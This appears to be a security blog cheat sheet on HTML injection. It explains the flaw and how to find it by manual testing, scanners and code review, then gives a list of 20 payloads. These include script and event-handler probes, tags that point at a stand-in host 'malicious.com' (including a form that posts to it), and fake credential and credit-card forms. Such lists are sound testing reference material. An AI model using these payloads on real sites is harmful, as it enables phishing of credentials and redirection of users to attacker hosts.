HTML Injection | Cheat Sheet | How To Find HTML Injection

HTML injection is a type of security vulnerability that occurs when an attacker is able to inject malicious HTML code into a web page. This can be used to steal sensitive information, redirect users to malicious websites, or even execute arbitrary code on the user’s device.

HTML injection is a serious security vulnerability that can have severe consequences for both the website owner and the users of the website. In this article, we will take a closer look at what HTML injection is, how it can be found, and some common payloads used in HTML injection attacks.

What is HTML Injection?

HTML injection is a type of security vulnerability that occurs when an attacker is able to inject malicious HTML code into a web page. This can be done by exploiting a vulnerability in the website’s code, or by tricking the website’s users into submitting malicious HTML code through forms or other inputs.

Once the malicious HTML code has been injected into the web page, it can be used to steal sensitive information, redirect users to malicious websites, or even execute arbitrary code on the user’s device.

HTML injection can be a serious security vulnerability because it can be used to steal sensitive information such as login credentials, personal information, or even financial information. Additionally, it can also be used to redirect users to malicious websites, which can be used to distribute malware or phishing attacks.

How to Find HTML Injection

Finding HTML injection vulnerabilities can be a difficult task, as they are often hidden within the website’s code. However, there are a few techniques that can be used to find these vulnerabilities.

One of the most common techniques used to find HTML injection vulnerabilities is manual testing. This involves manually testing the website’s inputs and forms for any signs of injection. This can include submitting special characters or HTML code through forms or inputs and checking the website’s response.

Another technique that can be used to find HTML injection vulnerabilities is automated testing. This involves using a tool that can automatically test the website’s inputs and forms for any signs of injection. There are a number of tools available for this, including Burp Suite and OWASP ZAP.

Finally, it is also possible to find HTML injection vulnerabilities by conducting a code review. This involves manually reviewing the website’s code to look for any signs of injection. This can be a time-consuming process, but it can be an effective way to find hidden injection vulnerabilities.

Payloads

  1. <script>alert(“XSS”)</script>
  2. <img src=”javascript:alert(‘XSS’);”>
  3. <iframe src=”http://malicious.com”></iframe>
  4. <form action=”http://malicious.com” method=”post”>
  5. <a href=”javascript:alert(‘XSS’);”>Click here</a>
  6. <svg onload=alert(1)>
  7. <input onfocus=alert(1) autofocus>
  8. <body onload=alert(1)>
  9. <object data=”http://malicious.com”></object>
  10. <embed src=”http://malicious.com”></embed>
  11. <link rel=”stylesheet” href=”http://malicious.com”>
  12. <base href=”http://malicious.com”>
  13. <frame src=”http://malicious.com”></frame>
  14. <applet code=”http://malicious.com”></applet>
  15. <form><input name=”username” value=””><input name=”password” type=”password”></form>
  16. <form><input name=”email” value=””></form>
  17. <form><input name=”address” value=””></form>
  18. <form><input name=”phone” value=””></form>
  19. <form><input name=”creditcard” value=””></form>
  20. <form><input name=”socialsecurity” value=””></form>
Tags: , , , , ,

Leave a Reply